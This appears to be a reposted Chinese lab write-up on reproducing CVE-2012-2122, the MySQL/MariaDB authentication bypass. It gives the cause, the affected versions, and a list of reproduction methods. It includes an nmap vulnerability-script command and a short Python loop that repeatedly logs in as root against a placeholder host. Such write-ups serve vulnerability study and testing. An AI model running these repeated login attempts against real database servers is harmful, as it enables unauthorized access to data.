微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

复现goby——CVE-2012-2122Mysql 身份认证绕过

一、漏洞介绍

当连接MariaDB/MysqL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MysqL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次。只要知道用户名,不断尝试就能够直接登入sql数据库。)


二、影响版本

All MariaDB and MysqL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MysqL versions from 5.1.63, 5.5.24, 5.6.6 are not.


三、goby扫描结果


四、漏洞复现

(一)利用goby自带的漏洞exp进行验证通过即代表有的。

(二)利用msf——Metasploit渗透框架

(三) 利用Linux中for循环遍历

 (四)利用nmap自带的脚本模块进行复现

@H_502_61@nmap -sV -T4 -p3306  --script=MysqL-vuln-cve2012-2122 x.x.x.x

(五)利用pyhon中的subprocess模块和while循环遍历

import subprocess

while 8:
    subprocess.Popen("MysqL -h x.x.x.x -u root MysqL --password=blan",shell=True).wait()

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐